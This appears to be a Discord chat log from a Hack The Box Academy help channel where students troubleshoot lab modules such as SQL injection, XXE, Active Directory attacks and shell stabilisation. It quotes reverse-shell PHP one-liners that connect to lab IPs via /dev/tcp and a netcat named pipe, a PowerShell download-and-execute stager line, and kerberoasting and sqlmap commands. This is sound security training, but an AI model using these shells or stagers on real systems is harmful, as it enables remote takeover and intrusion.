#modules

Okay sweet

Thanks for telling me thats dope there a place for that

You'll need to link your account following #welcome to access the channel that guy linked

@ocean night yall need to make the account link button actually work

Umm... I have no phone or working phone number ex made sure of it...

Don't need a phone to verify dude

Which link button, for account.hackthebox?

Yeah

I am screwed on verification and cool let me try then

It.. does? If it isn't for some, I'll mention it

? You just need an htb account

The /verify works

Oh, I thought I had mostly figured it out when changing my source port so that I now see 50000 is open. I have tried using decoy IPs as well but haven't gotten different answers. When trying to use -S to spoof an IP on the same subnet as it, I get errors saying it is unable to reach the host.

But on the account.hackthebox.com site linking the account via that api doesn't work :) (it also didn't work in academy)

Decoy IPs are useless

Is it not working for you?

And you need to have control over the ip to spoof as it

Can raise it internally, just would need something to go on

It hasn't for many, I tried a bit ago when I won silver to get the account link and never got the 'acedemy' role

So, for Discord roles?

Ye

Ah ok, so not the actual li nking of accounts to account.hackthebox

Yeah sorry for the confusion lol

I love u guys

this is great so far

np, will drop a message in bot channel

Bet let me link

I can see at some point about making a dummy account and try and link purely from the https://account.hackthebox.com > Security Settings > Discord account

It does nothing

Bro answered my prayers

It would be neat for it to actually do something

It’s being worked on, though.

@fathom pendant thank you

Already being worked on 🙂

You ahve no clue how helpful that is

Things doing things is awesome

especially when things are things too

Imho not having it there until it's ready would be far better

Thanks Emma ❤️

Or having a disclaimer that [currently does nothing]

And linking to a forum/article about linking via the app.hackthebox.com api token

I did it

thanks to you for real @fathom pendant

Nope you don't have a role

i linked it only

Unless discord hasn't updated yet

lol i mean linked

Linking via account.hackthebox.com does nothing [for now]

You need to link via https://app.hackthebox.com per the #welcome instructions

I am looking at that now

You sent your token as a message - bot commands - use the /identify command @minor locust

Your the goat I did lol for some reason i thought it was a click on url to link kind of thing

https://tenor.com/view/so-it-begins-raining-rainy-day-théoden-lord-of-the-rings-gif-16521230

Just check #rules too 🙂

I might get back to sweeping up these easy skill paths 🤔 might tackle the 8 seas adventurer mission in academy for fun, it includes the ad skill path (which i think is also in the CAPE job path) 🤔 only one outside all that is the OSINT module

I am going to speedrun this and codecademy as the main one since I am paying 200 and something yearly

Don't speedrun

Learn

You aren't in a race, you should be here to learn

You are not in competition with anyone in Academy

I'm not saying that to get you to spend more time on the platform. I'm saying it because if you rush through things, and only do the bare minimum, you'll end up coming out the other side with much lower retention of the knowledge you've had to demonstrate through the modules and courses.

Running gets you nowhere fast except tripping over yourself

I regret not spending a bit more time in the web modules because in my head they were 'too easy' and it bit me in the ass when I didn't have notes ready

I want to experience as much of the things out there first before that

I'm just a little picky is all

I do know a lot already so when I say speedrun that means just going through at a normal pace which is like a week for a whole course and another to practice

https://tenor.com/view/right-yeah-right-yeah-oh-yeah-ohh-gif-14553729619893238098

Ok

Well

Don't rush it

Do the modules, sections and exercises

Yeah I won't rush it like that lol

I want to learn and keep the information relevant

VPS not needed either. Proxying is the right track, don't forget about source ports

yeah I set it to 53

That foreheads so white it's shining like the sun

-p is the same as --source-port for netcat

The ears are huge too lmao

With netcat as well?

yes

Have some patience after running the nc command, it can take up to a minute

oh i found my issue

Deleting your earlier message bc spoiler

And I'm curious as to your issue lol. PEBKAC?

i wasnt running it with sudo

https://tenor.com/view/classic-back-to-the-future-bttf-marty-mcfly-ive-seen-this-one-gif-19802188

I would like to study and observe from someone here as I work on it all to share information with if similarities exist.

This is a self paced course, you can maybe find a study budy in #1318239802931286066

bet

#1318239802931286066 is strictly for HTB teams at the moment

i'll probably make a pinned post later

hi I am facing difficulty with the blind xpath injection? anyone able to help me to see the error in my code? thank you.

TIL you can drop the cheatsheets into Obsidian inline

I normally just make a folder for the cheat sheets and drop them there by module

I did the same, thought this was more convenient

can someone help me with What is the inode number of the "shadow.bak" file in the "/var/backups" directory? in linux fundamentals

What's the issue you are facing?

(in question 2)

after running stat -c %i /var/backups/shadow.bak this command it shows /usr/bin/stat: cannot statx '/var/backups/shadow.bak': No such file or directory

So what's in the /var/backups directory?

(there certainly should be a shadow.bak file there)

i dont know its showing nothing

Have you connected to the target?

im sorry i didnt get it like what target ....?

another target machine or something

So down where the questions are, just above there should be something like this

yes

You need to click that to spawn the target, then SSH in to it with the provided details. You need to be connected to the VPN as well, either through the Pwnbox, or via OpenVPN (with the config file you can download to the right of that)

If you click on "Click here to spawn the target system!", it'll create the target for you to connect to

So long as you are connected to the VPN, you will be able to SSH in to the target, and then find the answers for the questions 🙂

The purple team tier 0 for the last assessment on going from zabby to root I wouldn't expect a beginner to know how to priv esc

but is a short and nice course

This is just the Linux Fundamentals module though

Sorry, that came across wrong

We all start somewhere

yes it gave me a target so now what should i do with target

im sorry im beginner in it i just started like 2 weeks ago

i tried to get help from youtube but it was not much help full

Module: Document and reporting module lab

Connect to the testing VM using Xfreerdp and practice testing, documentation, and reporting
against the target lab. Once the target spawns, browse to the WriteHat instance on port 443 and
authenticate with the provided admin credentials. Play around with the tool and practice adding findings
to the database to get a feel for the reporting tools available to us. Remember that all data will be lost
once the target resets, so save any practice findings locally! Next, complete the in-progress penetration
test. Once you achieve Domain Admin level access, submit the contents of the flag.txt file on the
Administrator Desktop on the DC01 host.

i am stuck at this question, can any one help me out!

Ok, so it is prompting you to SSH in to the target. Have you used SSH before?

no

I have tried password spraying attack, got smb cred but did not find domain cred,

You should have read about SSH in a previous section in this module https://academy.hackthebox.com/module/18/section/70

Note, you are provided an IP address and a PORT NUMBER, so you may need to adjust the instructions slightly. You can find help about how to use commands in the previous section from the above https://academy.hackthebox.com/module/18/section/67

Sorry, but I've gotta go. Hope that helps you

sweeping up the skill paths 💪 https://academy.hackthebox.com/achievement/667914/path/9

nice

just missing bash scripting and ASM from the intro ones :)

haven't decided if i wanted to the the BOF ones

Hello has any one completed dcsync section from active directory attack and enumeration... I have already through the section just have doubt to clear .. plz reply if anyone finds tym

https://dontasktoask.com

what's your actual question, if it's not a spoiler

Sure I have completed that

Can someone assist me with Bypassing Basic Authentication on web attacks?

need to run a curl command to see what http headers the backend accepts, the example they gave me is :

curl -i -X OPTIONS http://SERVER_IP:PORT/

HTTP/1.1 200 OK
Date:
Server: Apache/2.4.41 (Ubuntu)
Allow: POST,OPTIONS,HEAD,GET
Content-Length: 0
Content-Type: httpd/unix-directory

When I run it it, I dont get the Allow output:
curl -i -X OPTIONS http://94.237.54.116:52101/
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2024 06:52:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1158
Content-Type: text/html; charset=UTF-8
[8:52 AM]
Any idea of what I can do to show the allow output? maybe a diffrent flag/method?

If i run the command on https:example.com? i get the desired result

I wasn't getting the options either I jusst gsve up

did you get the flag? I also cant change request method from GET to HEAD.. have no idea

Or I can, but not getting the results expected

hi, I'm just new to htb although been a certified OSCP can i know how to enable the general channel write access in htb ?

hi @dire zinc - please read #welcome

thanks i have completed it

thankyou

the reason is, that the web-server is not able to interprete php8-Files as php-Files.. i would try another extension

hello! does anyone know if exporting the academy material to have it printed is against any rules? i find a physical book much easier to consume and find it more engaging

ah was deleted 😛

yes

do you think I should send this to support?

I think it is best if you ask support

Sorry, I thought the "ah was deleted" was on the advertising I deleted

all good ;3 thanks!

anyone has the same problem with Attacking Common Applications - Skills Assessment I? i cant get shell with the CVE.py,
was able to upload nc.exe but cant get shell

nvm it worked after restarting pwn box

Hi guys,

I am doing the FUNDAMENTALS OF AI module, and I got stuck on the Skills Assesment on the last question:

" What deep learning architecture, known for its ability to process sequential data like text by capturing long-range dependencies between words through self-attention, forms the basis of large language models (LLMs) that can perform tasks such as translation, summarisation, question answering, and creative writing? "

The answer is "Transformer", but it does not accept it.

Any clues?

write it in plural 😉

Any good laptops for hacking ?

Hacking depends on the skills mostly

there's a saying in photography, "the best camera is the one you are carrying"

A poor carpenter blames his tools

You can have a 4k 144hz monitor, but if you're dogshit at the game it won't matter

Would recommend something with enough ram

I like the thinkpad t14 g4 amd 7840u

Okay

Still, it will depend on different aspects and your intentions… will you be running a virtual machine or bare metal? Multiple VMs at the same time or not?
My bare metal Celeron netbook works wonders (just not for hash cracking obviously).
And if you have a decent setup, for learning, you can always use the browser based VM.

Linux PrivEsc - Kernel exploits.

My brain is currently losing cells ;-;

Is there a way I can reset my progress on certain modules and/or paths?

can anyone help me on why I can't stabalize me shell?
after I write fg I can't do anything

I can't ctrl+C or anything

provide stty raw -echo; fg on a single line

It worked thanks alot!

Can you tell me why did this happen tho

https://www.youtube.com/watch?v=DqE6DxqJg8Q

It's a zsh quirk

Thanks guys!<3

If anyone struggles to install padbuster for the HTTPS/TLS Attacks module - there is a free burp suite extension that works just as well called "Padding Oracle Hunter"

You are da man! 😄 I was so silly. Thank you.

Im having an issue with the Academy module Pass the Ticket (PtT) from Linux. I'm connected to vpn but the host is unreachable. When I use the browser Parrot VM it can connect just fine, but I'd rather use my local VM that I've been using this whole time

Why aren’t you using the target ip?

I forgot I had reset the machine, hang on

same errors

put 'david@inlanefreight.htb' in single quotes

also you only have one vpn running, and aren't running the in-browser pwnbox at the same time?

have you also tried changing vpn region and resetting your openvpn connection?

One VM running connected to VPN. Did not disconnect when I tried the browser pwnbox

Only redownloaded VPN connect file, did not change region

turn off the browser pwnbox

make sure you sudo killall openvpn before conneceting to the new one

hey it magically started working 🙂

sorry for raising the alarm, I had given up last night from this issue and had the same this morning. on lunch break at work and got frustrated. Thanks for the help!

this box is frozen.....

Module: Web Attacks
Section: Blind Data Exfiltration
Question: Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

I have tried to follow the first method exactly as given, but I am not getting the second request after fetching the xxe.dtd file. I cannot spot any mistakes.
I tried the second method with XXEInjector and that worked fine

You're missing a > in your dtd file

well that was simple, thanks

Good Afternoon, someone can help me?

guys, Im trying to list available shares of the target machine, why am i getting this error? Connection is ✅

I would suggest you ask your question directly, so someone can take a look

Can you ping the target?

yes

i don't know why i can't get it the wrappers

hmm reset the machine

order of arguments seems to be important for smbclient, try -U and then -L

i tried both options none worked unfortunately!

Wich question/module are you doing? @dawn abyss

smbclient -L //server_name -U users try adding // before the ip

worked , thank u! 🤟🏻

I am a bit stuck on the ADCS Attacks -> skills assessment

requested a Cert (with coersion), but it needs approval to be issued from admin

on the dev machine, i can connect on SMB but in IPC$ is readable

i setup proxychains, but can't make the xfreerdp to work over the SSH tunnel to the dev machine

im doing the module on shells in the pentest path and it makes a point of how a bind shell drops you directly into an (interactive) bash session... and i guess the implication being that reverse shells require upgrading?

is this always true:

-bind shells connect to interactive
-reverse shells must always be upgraded to interactive

?

I am working on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting and Tunneling module, I am stuck on connecting to the windows machine with the flag, everytime I try to rdp it allows credential entry and the window pops up but then it closes the connection before the desktop can be displayed. I am getting some errors in the proxifier - " Cannot connect to placeholder (fake) ip address, its reccomended to restart the client application"

Nope, it depends on what's configured to begind with. Sometimes you will land in a restricted shell and will need upgrade. But for reverse shells I think it could be true for most cases.

pls

i need help

with what HTB Academy module?

File Inclusion

the wrappers

i can't find it

i'm not sure what you mean.. if you can describe what you're trying to do and what the issue is

the problem is that i can't find Try to gain RCE using one of the PHP wrappers and read the flag at/

BuirSuite not loading i think

and what have you tried doing

provide some screenshot for your request?

make sure you're converting to base64

if im recalling from memory correctly

Did you try reading the cheatsheet

odds are your query is on there

Does completing a skill ass. automatically give you the cubes for everything else in that module? Or do you need to do each section too?

you have to do everything individually

So what was the reasoning behind making session security a multi machine module?

second is true but only if you want the same experience

maybe ask the module author?

Hey

Yo

Hey everyone! I’ve been wondering: If I already have a Golden Ticket and an NT hash, why would I need to crack the password hash? Could you help clarify the scenarios where cracking a password hash would be useful, and also when it might not be necessary while attacking Active Directory? Thanks in advance for sharing your insights!

If I recall correctly, one of the primary reasons is for systems that are not AD joined. So in general, password reuse. Might be missing some additional details though

you need user creds for other systems

but yeah it might not be necessary in AD

Thanks!

Hello all. I am working the last question on the SMTP Section under the Footprinting Module. I am using the appropriate script with nmap. I've used the resource but I believe there is a issue with timing however, I've tried several timiming settings from the script's options not "T0, T1, ect" and my results are right. Any assistance would be appreciated. Thank you.

Don't use the nmap script. Just use the standalone one

t0 affects nmap scanning, not script options

Interestingly I am not using the T settings but the unpwdb.timelimit albeit through nmap. Does manipulating that setting not work if it's through nmap?

Linux Privilege Escalation - Kernel exploit.
I got the proper exploit that was mentioned in the hint, however upon launching it I have a bash shell which is apparently root.

Problem is that I am somehow now allowed. I also noticed that in the exploit itself the shell is launched with the parameters:
"--norc" "--noprofile" (2nd pic)

Do I have to edit the exploit in some way or no?

I was able to obtain the flag using a shell from a previous task, but that's not the point. I want to know where to fix the exploit so I do it the way it's supposed to.

There's a standalone smtp-user-enum script

Ah. Found it and working with it now. This lab would lead you to think it can be solved using nmap. Is this lab a bit misleading or am I just not thinking out of the box enough? I am genuinely curious.

You'd need to pass in --script-args

Wow this AD module is a long one 😓
https://academy.hackthebox.com/module/details/143

Thank you so much! I was able to solve this with stand alone perl script manipulating the "-w" variable. It's odd that the nmap nse script manimuplated the --script-args unpwdb.timelimit method for the same amount of time did not give the same effect. Do you have a thought on why that might be? It would seem like they should have the same effect.

Each script has their own args to pass. I never botheted

Bothered*

Sounds like it will be another hacking mystery 🙂 Thank you again.

Hi I am stuck in the "password attacks module". I am at the "protected files section" There is only one task
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer. i have logged to the machine using kira password but i can`t find the " id_rsa file "

any hint ? i used ||grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1"|| but ifound nothing

In the "Intro to C2 Operations with Sliver" -> "Assumed Breach" module, it utilizes a stager.txt file under the scheduled tasks section but the generation for this file doesn't appear to be shown anywhere (previously only an aspx stager was generated). Am I missing something here?

Wasn’t stager.txt also used in the aspx section?

staged.txt was used but its just a shellcode byte array

I assume to get stager.txt to execute inside iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt') you need to put the byte array in some sort of shellcode loader that was never mentioned in the module

Also this wasnt required to complete the section so maybe its just extra credit but idk kinda feels a bit off to not include a basic example loader and compilation steps

Did you check the users .ssh dir?

have you tried it?

i dont think i did that part but im pretty sure the iex just loads it

I did it didnt seem to be working for me, I can try again in a bit

yeah no if you try loading the stager.txt they showed before you just get the error byte[] : The term 'byte[]' is not recognized as the name of a cmdlet, function, script file, or operable program.

which makes sense cause the stagers are always generated as shellcode

👀

Hello. For greenhorn machine, when I upload a reverse shell.zip file to greenhorn, it doesn't connect to netcat. Netcat keeps listening. I have tried to use pentestmonkey reverse shell.php and the php code that ippsec showed but no luck.

I get no access

public channels, makes sense

it'll probably get a bit wordy if they explain why in a description, probably good for an update to #welcome

or if there is an FAQ on their website about how HTB discord operates

I am trying to test HTB Box Vintage but encountered difficulties. According to the domain account provided by the author, bloodhound-python cannot be used, always reporting errors such as authentication failure, but windapsearch and ladpsearch can be used normally. Is it really impossible to use bloodhound here? I hope someone can enlighten me, and I sincerely appreciate your help in advance.

try asking in #boxes

I don't have access to that place, and I don't know what's causing it

follow the steps in #welcome

ok

Hello, may I have some help for the web attacks skill assesment ?

I found an IDOR vuln allowing me to access the profile of any user but can't find anything more...

Enumerate the users and look for a user who may have higher privileges than others.

Ok thanks I did that but if i found nothing I guess my script has an issue. I will go back to this step

I'm doing the Stored XSS portion of the XSS module. I'm testing the payload "<script>alert(window.origin)</script>" in the To-Do list but it is not popping an alert window. anyone had this issue? also getting a error: request validation, anytime i try to start the pwnbox

I bet trying again tomorrow would fix it ;p

Under the XSS Testing Payloads section it explains you may need to use a different payload...

Wow, I was using the "reset" button like it was a submit button lol

such fail. ty

Might be a dumb question but is it possible to run my own bash to go through modules instead of using theres

you can use your own virtual machine instead of the pwnbox, if that's what you're asking

you just need to download and use the vpn file

oh okay thanks

hey , i trying to figure out how to know the internal app asked for in injection Attacks Module Exploitation of PDF Generation Vulnerabilities Section , have been trying for 2 hours to know what is it and how to reach it

https://academy.hackthebox.com/achievement/790958/189

Well, it was kind of tricky, but got a lot of fun

Please don't post potential spoilers also always be mindful of what you're looking at.

how to solve this sir? its under basic toolset, ive used every NSE script available but still dont find the right flag

Are you sure that service is the right service, and not say a web service?

Also always make sure no extra whitespace in front or behind the copy/paste

yes sir i always make sure

wdym by this sir? sorry im still learning

but all i did is scanned all the ports

Maybe check all the ports you found

individually? does it give a different results if i scan one by one?

Each port is hosting a different service. Don't solely rely on nmap, this one is a bit silly with scripts sometimes

But the scripts shown in the section should be helpful

hey i am wanna know is there any resource to learn win authentication . On HTB its very high level to me .

There's several windows related modules, from basics to not so basics (mostly AD)

Unless I'm misunderstanding

Might be a lost in translation thing, not sure what you're meaning by "learn Win authentication"

i mean on yt i dont understand a thing about it and on other websites too

You have NTLM and Kerberos

And both are well enough documented

yeah and how they work

So is LSA and LSASS

¯_(ツ)_/¯

Just gotta look them up

i am on password attacks module and there they introduced win authentication . then didnt understant that and went to yt there i found bluehat conference video explain win authentication . and again i didnt get it

let me try finding windows basics and maybe i can find somethign in that module

https://networkencyclopedia.com/local-security-authority-lsa/

Are you referring to a flag in a command stating like -windows-authentication?

If so. You're massively overthinking it

they said in the module its complex

That command flag just tells the process that it will be interacting with a windows machine and encode/wrap communication with the appropriate TLS

Not as complex as you're thinking, what exact section?
It's complex in the sense that they're not gonna explain it in the password attacks module

i am on credential storage

its still a intro

in the module password attacks

Oh, you don't really need to dive into how the authentication works

get lost bro you are not a social engineer

This server isn't hacker4hire. Read the #rules skid

yeah but i wanna know at some point in life it will come handy 😅

It really won't

At a surface level all I've needed to know was just the credential stuff like NTDS.dit, the SAM/SYSTEM/SECURITY hives, and the LSASS.dmp

Alongside ticket shenanigans via mimikatz/rubeus. But the ticket stuff is (again) surface level. You'll learn more about it when you actually need it

But you don't need to know the low level details of how they're stored and the encryption mechanisms

yeah i will take this advice .

As there's already tools that do the hard part for you

Unless you actually want to dig deep into it and write your own scripts to decode/decrypt those. But that's far beyond basics

you are right but i like to study like this . and for the sake of saving time i will skip this

👍

👍

I'm sure books and stuff exist that break it all down

Idk mate Session Fixation sounds like a non issue. Isn’t a session cookie supposed to stay the same and id a session anyway?

yeah i dug deep into named pipes and IPC by reading LINUX PROGRAMMING INTERFACE . BUT AT LAST THAT KNOWLEDGE IS NOT USEFULL TO ME

Reading ahead will only confuse you more

Don’t do that

That's the neat part, you'll likely rarely (if ever) use named pipes

YEAH OTHER THAN BIND SHELL

please release your shift key

Why are you yelling for?

very good video https://www.youtube.com/watch?v=OjWn4VUeT8A&list=PLwb6et4T42ww94O3z5QDNQsO1f_BwhX-L

Also, your name is cringe

It’s a matter of perspective really

I think they meant about the auth mechanisms themselves

Not your name, your name is nerdy

Oh okay

yeah i think so

Their name is giving MrR0b07 vibes

what about sam sapeol

Who?

is Skills Assesment at Introduction to Windows Command Line lab machine down? I cannot get connection to the assesment machine. I checked if this was a problem of my VPN, but if I spawn a machine in any other section within the same module I do get connection to the module task machine 🤔 weird. I even tried spawning Pwnbox and it does not have connection either

Hello guys , i wish all is fine . and need a help (this word's from my heart ) i start leran the path of cpts and when i finish the fifth module i repeat again . because i afraid from i miss any thing and their is some points that i didn't understood 100 % . so please give me your advices . and if there is some Suggestions to how to study for cpts ex: videos or ....

Do some boxes, the exam won't be exactly like the modules.

On Injection Attacks - LDAP Authentication Bypass I dont understand why they provide user login creds?

i think to Lateral movement

Hi guys, currently on the sql map module and having a little trouble with "running sql map on an http request" section. I am stuck on the second question which is case 3. I am a little confused on how to go about doing it (possibly because Im coming back to this after a while and skimmed the text). I tried intercepting the request in burp and saving it as a txt file and running it but no luck

this is the page

On the page it says what field you should test and that is not tested by default (in level 1), so you either have to manually point the tool to the injection point or increase the level to 2

I tried this sqlmap - u url --cookie "value=1, name=id" --dump

this is the hint

Try to see where the 'id=1' is sent, and specify this location as the injection mark.

however Ive already clicked the button for the id being sent and I cant seem to get it back otherwise I would have intercepted with burp

The request should be in your text file and why don't you try the stuff mentioned in the hint?

thats what im confused on, how do I see where the id is being sent?

it says it right there on your screenshot

ahh the email?

no

in the first screenshot where it says "critical" then?

on the webpage

it just says some generic things that ud find in an database, where does it say where the id is being sent 😅

Look at the Custom SQLMap requests bit

that should sort your problem

i tried this

its almost correct

but not quite

dont think its a put request?

[WARNING] POST parameter 'id' does not seem to be injectable

heres what i got after testing sqlmap -u ip --data='id=1' --batch

You need to look at what is happening

did you capture your request with burp?

i believe I did, theres nothing to input on the page apparently so what I did was refresh the page and captrure the request with burp using that method

Look again

I think it may be cookie instead of "data"

Continue with that idea

and it clearly tells you waht to odo in the page

Detect and exploit SQLi vulnerability in Cookie value id=1

It tells you to use the cookie, and a cookie can be found where in a request?

okay ive refreshed the page and captured the request, i see that cookie has an id of 1 and I will try to do sqlmap -r req.txt?

in the cookie section in burp

or in the storage section on firefox

Okay, so a small lesson on HTTP requests.

Cookies go in the headers. In your section there's an example of cookies

the --data puts whatever you put in the body

ahhh so change --data to --headers?

in my command?

yes,
--headers="..."
or
--cookie="..."

Best to put in the URL

take in mind, your -Cookie is wrong

its --cookie

And, you still need to tell sqlmap that you want to inject the cookie, and not just provide the cookie

almost there: #modules message

sqlmap -u http://94.237.51.215:57471/case3.php --cookie="id=1*" --batch

yes, now read the question again and you got it

ahh ok found out the backend dbms is mysql

you're 1 step away from the answer, need to read the question again for the final parameter

it says the contents of case 3

table

yes

--table ?

almost

--tables ?

sqlmap -h will tell you which parameter to use

ahh ok seem to have gotten flag3 there just need to cat it out somehow

sqlmap -h will tell you how to just get the table you need

ahh ok ill have a look at that

i tried this

add the --dump

and look into -T

yeah --dump

I'd just do this -T flag3 --dump

not the --tables

thank you it worked

Took out so much time for something like that 😦

I really appreciate it bro

me?

Ah Sorry I forgot to mention the old message

ah np

Can I Message You?

sure, dm me @soft reef

I'm working on the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab and it seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". Can I get some help, please?

Yeah I have some time now.

Is PowerView broken on the skills assessment part 1 box? Getting an error "exception calling FindAll". Tried two versions of PowerView, ep is in bypass, script has downloaded correctly and shows imported when running 'get-module'. Look like no PowerView commands are working? This is from a meterpreter session gained from the web shell that's provided.

kerberos double hop problem?

try get-domain

I've just got the shell as system though on WEB-WIN01, no results from get-domain

do you have clear text credentials?

No creds

what module is that?

You start with a powershell webshell running as system, so got a meterpreter shell and tried using PowerView

AD enum/attacks part 1

Will check my notes

maybe they changed because my notes I didn't need to get inside web-win01, and you should have atleast svc_sql creds

with this cred you can use the -Credential from powershell, most of the times this FindAll is a problem with your logon session

You use WEB-WIN01 to kerberoast/crack that SQL account, that's question 2

I'm gonna be honest with you I didn't even used the windows machine there, only impacket, secretsdump and psexec

Oh I think I found where you are, you used this webshell right? /uploads/antak.aspx ?

You need a domain account though to kerberoast?

Yeah yeah that's the one

Yes, but what I did was add a new user to the administrators group, secretsdump from impacket to get the machine acc hash and then use impacket getusersspn

GetUserSPNs.py INLANEFREIGHT.LOCAL/'WEB-WIN01$' -dc-ip 172.16.6.3 -hashes :<hash> -request -usersfile users.txt

But it is strange that if you are running as system you are technically connecting to the domain with the domain computer account so powerview should have no problems with that

Ahh I see, will go through it that way. Just seems strange, unless it's a double hop issue as I'm going from metepreter session to powershell ? Not sure

Thanks! 👍

I will try some time later this module again and if something works I will tell you

Could try to get a PS rev shell and try PV that way to rule out an issue with your PV.

Did you have to setup a pivot for this? I can't get to the DC from my attacker box, it's on the 10.10 network

Yeah you'll need a pivot to run it from your attack box.

Will give that a go, it's strange as other powershell commands work just not domain related ones

It's not even mentioned proxychains yet so strange how I would be expecting to pivot for the first assessment ? I don't think it has anyway

I think it assumes you would use powerview.

I've done it a few ways for fun and I prefer to setup a pivot and run everything from my VM.

Yes, as the guy said

Box just restarted and PV now works from the meterpreter > shell > powershell and from a direct PS rev shell

Good day. I am working on USING CRACKMAPEXEC > Password spraying. When trying to create a user list from NULL authentication using crackmapexec smb 10.129.204.177 -u '' -p '' --users --export $(pwd)/users.txt, I receive an error on the --export. Is there another way to accomplish this? Thanks

what's the error

netexec: error: unrecognized arguments: --export /root/userslist.txt

It occurs with netexec or crackmapexec.

I tries -o and it appears to work. However, I cannot find the file after successful execution.

is that a real flag?

No. I am trying to create a user list from enumeration of AD Users using NULL sessions.

after it finishes executing it should tell you where it saved to

There should be a .cme or .netexec or similar directory in your home. You may be able to find the file there.

I tried locating it using 'locate', but nothing returns. I will look into the directories.

Good Afternoon

someone can help me ?

Please don’t ask to ask

Just post your issues and someone might reply

Post what module and section you’re stuck at

Hello everyone,

Could someone help me on the Web Attacks module, on the Advanced File Disclosure chapter, I try to reproduce what is explained, I can't do it during my exercise on the quiz.
I try with the CDATA method and with the error based.

Could someone help me?

okey sorry

Some exercises are not 100% the same as what is explained on the page. Sometimes you need to think a bit outside of the box

locate may not show hidden directories

So in this case could you guide me on the exercise so that I can understand it well?

Sorry I’m not at my computer

Ok, no worries.

if anyone else could help me that would be great

can someone tell me if theres any functional difference to these two reverse shells?

(outside the exception of /bin/sh and /bin/bash... if the fifo script used /bin/bash would it still work? its the first time im seeing it as its mentioned in the cpts path

<?php system("/bin/bash -c 'bash -i >/dev/tcp/10.10.15.80/4444 0>&1'"); ?>



<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>```

where is can i send photo

both work just fine; one just utilizes named pipes

the named pipe one though, coudl one insert /bin/bash instead of /bin/sh ?

or is that a requirement of the pipe?

yes

assuming bash exists of course

you can use any shell

ok tyvm

as long as it exists ¯_(ツ)_/¯

the named pipe one... that is more academic? ive never seen anyone use it... its a long ass cmd?

not really 'more academic' not even sure what you mean by that

it's just a different way to do something

i mean, it seems that its something mentioned for for students information but doesnt seem to be used often in practice

it can be used in practice

some people prefer the named pipe over the /dev/tcp/ ¯_(ツ)_/¯

yeah that reminds me... could one do something like (forgive any error here im using the below example as pseudo script as i dont fully understand the mechanics)...

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| /dev/tcp/10.10.15.80/4444 >/tmp/f"); ?>```

basically, a variation or combintion of the above two methods

to arrive at the same result

it's not a "combination"

it's just another way to do something

but also it wouldn't quite work that way

/dev/tcp/ip/port is a file location moreso than it is an executable

like nc

so you'd more do > or < redirectors

i see

but the best way to figure it out is to spin up a vuln machine and fuck around

the labs are isolated so you can't brick anything that a reset can't fix ¯_(ツ)_/¯

and you can't mess with someone else's machine

PS C:\windows\system32\inetsrv> $username = "inlanefreight.local\svc_sql" 
PS C:\windows\system32\inetsrv> $password = "Redacted" 
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force 
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword) 
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName MS01 -Credential $cred

When running this I'm expecting a new powershell session but it keeps me at the same prompt. Doesn't show the new session like in the course, any ideas?

how can i sent Photo?

ask nicely /s
you need to link your account via the #welcome instructions

how friend

try with single quotes

there's instructions to link your account in #welcome

Read what Marcie said and follow three simple steps

Exact same, just takes me back to the prompt

PS C:\windows\system32\inetsrv> $username = 'inlanefreight.local\svc_sql' 
PS C:\windows\system32\inetsrv> $password = 'redacted' 
PS C:\windows\system32\inetsrv> $SecPassword = ConvertTo-SecureString $password -AsPlainText -Force 
PS C:\windows\system32\inetsrv> $cred = New-Object System.Management.Automation.PSCredential($username, $SecPassword) 
PS C:\windows\system32\inetsrv> Enter-PSSession -ComputerName 'MS01.inlanefreight.local' -Credential $cred 
PS C:\windows\system32\inetsrv> PS C:\windows\system32\inetsrv> whoami nt authority\system 
PS C:\windows\system32\inetsrv> hostname WEB-WIN01  

I have a serious question. Suppose, I get a one month subscription where I unlocked all the modules upto tier 2. Then, my subscription ran out. Then the module access are also lost..?

yes

you only keep modules you purchased with cubes

oh... I see. Thanks for the info.

any access-based subscriptions you don't keep the modules unless you 100% completed them

any doc on how to make msfconsole work with proxychains ? more precisely forward the shell over an intermediate server ? because the server that is exploited can not talk directly to my tooling server

okay

i have this problem

i can't find the wrappers

Nice screenshot

😦

xD

i have virtual box bro xD

You can still take screenshots from your host you know

i don't know 😅

Win+Shift+S

Alt+PrintScreen

world is your oyster

Hello 👋

Hi

Please read #welcome and #rules it will explain how to get verified

try inlanefreight\user

Hello, i am doing the Footprinting Easy Lab, I skipped the DNS and logged in with the ||ceil ID over ftp||, i used ||ls -la||. i only see the root user but not really a directory i guess, just '.' and '..' any help would be appreciated

I remember using the error based method. Not much deviation from that section that I recall.

okey guys

now sorry my cloumsiness

clumsiness

that is my problem

i can't find the wrappers

at burpsuite

this section tends to work best when you're looking at the page source

also best practice to just add at least 4-5 ../

i don't understand friend. can you explain me better?

the > raw < instead of > render < or even > pretty <

scroll through the render/raw/pretty output

mmm

Module: Active Directory enumeration and attacks
Section: enumeration & retrieving password policies
I am having trouble on finding out the default password length when a new domain is created.

XMLLint doesnt seem to be operating "exactly" as output in a demo im walking thru...

Demo Output:

Exciton@htb[/htb]$ curl -s http://10.129.42.190/nibbleblog/content/private/users.xml | xmllint  --format -

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1608182184</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.2">
    <date type="integer">1608182171</date>
